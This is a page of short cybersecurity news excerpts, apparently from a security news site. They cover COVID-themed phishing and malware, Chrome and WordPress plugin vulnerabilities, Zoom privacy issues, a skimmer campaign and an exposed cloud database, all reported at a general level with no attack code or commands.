image
Researchers have discovered threat actors once again capitalizing on the COVID-19 pandemic and current attention on the World Health Organization (WHO) with a new spearphishing email designed to spread the LokiBot trojan sent using the WHO trademark as a lure. Researchers at FortiGuard Labs on March 27 first observed the malicious COVID-19-themed scam, which claims to be from the WHO and attempts to address misinformation related to the pandemic to convince users it’s authentic. Instead, it sends an attachment that unleashes the infostealer LokiBot if downloaded and executed, according to a blog post published Thursday by threat analyst Val Saengphaibul. “The body of the email contains multiple points about infection control and other suggestions and recommendations, which is obviously a lure to further compel the recipient to continue reading,” he wrote in the post. “And in a twisted fashion, the messaging pretends to address misinformation related to COVID-19/Coronavirus.” While the message, written in English, has legitimate characteristics, the threat actors behind it likely do not speak English as a first language due to “some obvious grammatical, punctuation and spelling issues,” Saengphaibul pointed out. The message also makes an obvious blunder by saying it is from the WHO Center for Disease Control, linking the Switzerland-based WHO to the U.S. Center for Disease Control (CDC)—two entirely separate organizations. Moreover, in the body of the message, the author…

Source

image
On Thursday, Google released security patches to stomp out high-severity vulnerabilities in its Chrome browser. Patches for all the bugs Google disclosed in its security advisory roll out over the next few days. Overall, eight security bugs were addressed in Chrome browser version 80.0.3987.162 for Windows, Mac, and Linux. The most severe of these flaws could allow for arbitrary code execution, according to the Center for Internet Security (CIS). “Successful exploitation of the most severe of these vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser,” according to CIS in a Wednesday alert. “Depending on the privileges associated with the application, an attacker could view, change, or delete data. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.” As is typical for Chrome updates, Google is initially scant in details of the bugs “until a majority of users are updated with a fix.” It did outline three of the vulnerabilities that were discovered by external researchers, however. These included two high-severity vulnerabilities the WebAudio component of Chrome (CVE-2020-6450 and CVE-2020-6451). The WebAudio component is used for processing and synthesizing audio in web applications. The flaws tied to CVE-2020-6450 and CVE-2020-6451 are both use-after-free flaws. Use…

Source

image
Zoom has nixed a feature that came under fire for “undisclosed data mining” of users’ names and email addresses, used to match them with their LinkedIn profiles. The feature, the LinkedIn Sales Navigator, is a LinkedIn service used for sales prospecting. When users enter a web conference meeting, the tool automatically sent their user names and email addresses to an Zoom internal company system. This system would then match this data to their LinkedIn profiles, according to a New York Times investigation. Per The New York Times, the tool also automatically allowed other meeting participants to covertly access this LinkedIn profile data, without Zoom asking for users’ permission or notifying them. That means if a user is in a Zoom meeting – even if they aren’t using their real names – other participants could collect information about their real names, locations, employer names and job titles. The tool was removed on Thursday as part of several sweeping changes Zoom made in response to snowballing security and privacy concerns. Zoom founder Eric Yuan said in a Wednesday post responding to the concerns that Zoom will freeze the development of its features and instead focusing on security and privacy issues. “Over the next 90 days, we are committed to dedicating the resources needed to better identify, address and fix issues proactively,” said Yuan. “We are also committed to being transparent throughout this process. We want to do what it takes to maintain your trust.” With…

Source

image
Phishing attacks looking to take advantage of interest and fear around the COVID-19 health crisis are becoming a pandemic themselves – and apparently cybercriminals are looking to conserve resources by leaning on their older stockpiles of weapons to keep the infection wave going. Or Katz, a researcher at Akamai, said in a posting on Thursday that older phishing kits that were previously deployed and then retired are being pressed back into service in order to target those working from home. In fact, Akamai researchers have seen recycled phishing kits from as far back as July being used in coronavirus-based phishing attacks now. Millions of Americans are telecommuting due to self-isolation, mandated quarantine or corporate policies as coronavirus infections continue to spike. Akamai’s team, like many others in the security community, has recently observed phishing attacks that start with SMS messages or emails that direct victims to domains “seemingly related to COVID-19 news, governmental updates, or health-related products and services.” In the latest attacks, which have been seen globally, victims that click the link are directed to one domain and then immediately redirected to yet another. The second domain spoofs big brands like Microsoft, Orange France and eBay, or health resources such as the World Health Organization or local medical experts. “By pretending to be an insurance company, bank, medical expert or other trusted brand, criminals are convincing victims to…

Source

image
As the Coronavirus pandemic continues to force people to work from home, countless companies are now holding daily meetings using videoconferencing services from Zoom. But without the protection of a password, there's a decent chance your next Zoom meeting could be "Zoom bombed" — attended or disrupted by someone who doesn't belong. And according to data gathered by a new automated Zoom meeting discovery tool dubbed "zWarDial," a crazy number of meetings at major corporations are not being protected by a password. zWarDial, an automated tool for finding non-password protected Zoom meetings. According to its makers, zWarDial can find on average 110 meetings per hour, and has a success rate of around 14 percent. Each Zoom conference call is assigned a Meeting ID that consists of 9 to 11 digits. Naturally, hackers have figured out they can simply guess or automate the guessing of random IDs within that space of digits. Security experts at Check Point Research did exactly that last summer, and found they were able to predict approximately four percent of randomly generated Meeting IDs. The Check Point researchers said enabling passwords on each meeting was the only thing that prevented them from randomly finding a meeting. Zoom responded by saying it was enabling passwords by default in all future scheduled meetings. Zoom also said it would block repeated attempts to scan for meeting IDs, and that it would no longer automatically indicate if a meeting ID was valid or invalid….

Source

image
Key Ring, creator of a digital wallet app used by 14 million people across North America, has exposed 44 million IDs, charge cards, loyalty cards, gift cards and membership cards to the open internet, researchers say. The Key Ring app allows users to upload scans and photos of various physical cards into a digital folder on a user’s phone. While Key Ring is primarily designed for storing membership cards for loyalty programs, users also store more sensitive cards on the app. According to the research team at vpnMentor, it found 44 million scans exposed in a misconfigured cloud database that included: Government IDs, retail club membership and loyalty cards, NRA membership cards, gift cards, credit cards with all details exposed (including CVV numbers), medical insurance cards and medical marijuana ID cards, among others. vpnMentor said that it found a total of five misconfigured Amazon Web Services (AWS) S3 cloud databases owned by the company. These could have revealed millions of these uploads to anyone with a web browser, thanks to a lack of password-protection on the buckets, the company said. Also, every file could also be downloaded and stored offline. Threatpost reached out to Key Ring’s media team multiple times over the last few days for a comment or reaction to the findings, with no response — and will update this post with any additional information should the company eventually respond. Five Databases of Information According to the research, launched Thursday…

Source

image
Researchers have observed a new skimmer from the prolific Magecart Group that has been actively harvesting payment-card data from 19 different victim websites, mainly belonging to small- and medium-sized businesses (SMBs), for several months. RiskIQ researchers first discovered the skimmer, dubbed MakeFrame for its use of iframes to skim data, on Jan. 24. Since then, they’ve captured several different versions of the skimmer with “various levels of obfuscation,” researchers Jordan Herman and Mia Ihm wrote in a blog post published Thursday. The versions range from from development versions in clear code to finalized versions using encrypted obfuscation, they wrote. “This version of the skimmer is the classic Magecart blob of hex-encoded terms and obfuscated code,” Herman and Ihn wrote. “It is nestled in amongst benign code to blend in and avoid detection.” MakeFrame also leeches off the compromised site for its functionality, a technique that in particular alerted researchers that MakeFrame is most likely the work of Magecart Group 7. And, targeting SMB sites, as MakeFrame does, also is indicative of Magecart Group 7 activity, researchers said. “In some cases, we’ve seen MakeFrame using compromised sites for all three of its functions — hosting the skimming code itself, loading the skimmer on other compromised websites and exfiltrating the stolen data,” Herman and Ihm wrote. Indeed, Magecart Group 7 typically uses victim sites for skimmer development, which was also…

Source

image
A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply “Coronavirus.” Overwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, global financial damage. Worryingly, according to the SonicWall Capture Labs Threat Research team, the fresh malware strain is also a destructive trojan. And like its namesake, there’s no cure. In a posting on Tuesday, researchers explained that victims of the Coronavirus trojan find themselves with a gray screen and a blinking cursor with a simple message, “Your computer has been trashed.” The novel coronavirus, and the disease it causes, COVID-19, has provided a depth of fodder for cybercriminals looking to capitalize on the global concern around the pandemic. For instance, a recent spate of phishing attacks has used the promise of financial relief due to the disease as a lure. However, the operator behind this malware takes it one step further, going so far as to take the coronavirus as its name and infection theme. As far as that infection routine, the malware can be delivered in any of the usual ways – as a malicious email attachment, file download, fake application and so on. Upon execution, the malware starts its process by installing a number of helper files, which are placed in a temporary folder. The malware cleaves tight to its pandemic theme: An…

Source

image
Researchers are warning of an upward surge in social-engineering lures in malicious emails that promise victims financial relief during the coronavirus pandemic. The slew of campaigns piggy-back on news of governments mulling financial relief packages, in response to the economic stall brought on by consumers social distance themselves. This latest trend shows cybercriminals continuing to look to the newest developments in the coronavirus saga as leverage for phishing campaigns, targeted emails spreading malware and more. “These campaigns use the promise of payments by global governments and businesses (specifically financial institutions) aimed at easing the economic impact of the ongoing pandemic to urge users to click links or download files,” said Proofpoint researchers, in analysis released Wednesday. One credential-phishing campaign has been spotted primarily targeting U.S. healthcare and higher-education organizations (as well as the technology industry, including information-security companies), with a message purporting to be from their payroll departments. The emails, titled “General Payroll !” explain that the Trump administration “is considering” sending most American adults a check to help stimulate the economy. “The Trump administration is considering sending most American adults a check for $1,000 as part of the efforts to stimulate the economy and help workers whose jobs have been disrupted by business closures because of the pandemic,” says the message….

Source

image
A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin, known as Rank Math, could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. It’s a WordPress plugin with more than 200,000 installations. According to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 vulnerability severity scale). It could allow an unauthenticated attacker to update arbitrary metadata. This can be abused to grant or revoke administrative privileges for any registered user on the site. The second vulnerability is characterized as high-severity (7.4 on the severity scale) and could enable an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice. Wordfence disclosed the bugs to the developer of the add-on on March 24 (its full name is “WordPress SEO Plugin – Rank Math”) – and CVE tracking numbers are forthcoming, researchers said, in an analysis released Tuesday. A patch is now available in the latest version, 1.0.41.1, so Web administrators should update their sites. Critical Metadata Flaw Rank Math allows users to update the metadata on website posts – which is where the bug lies, according to a technical analysis published on Tuesday by Wordfence. The plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called…

Source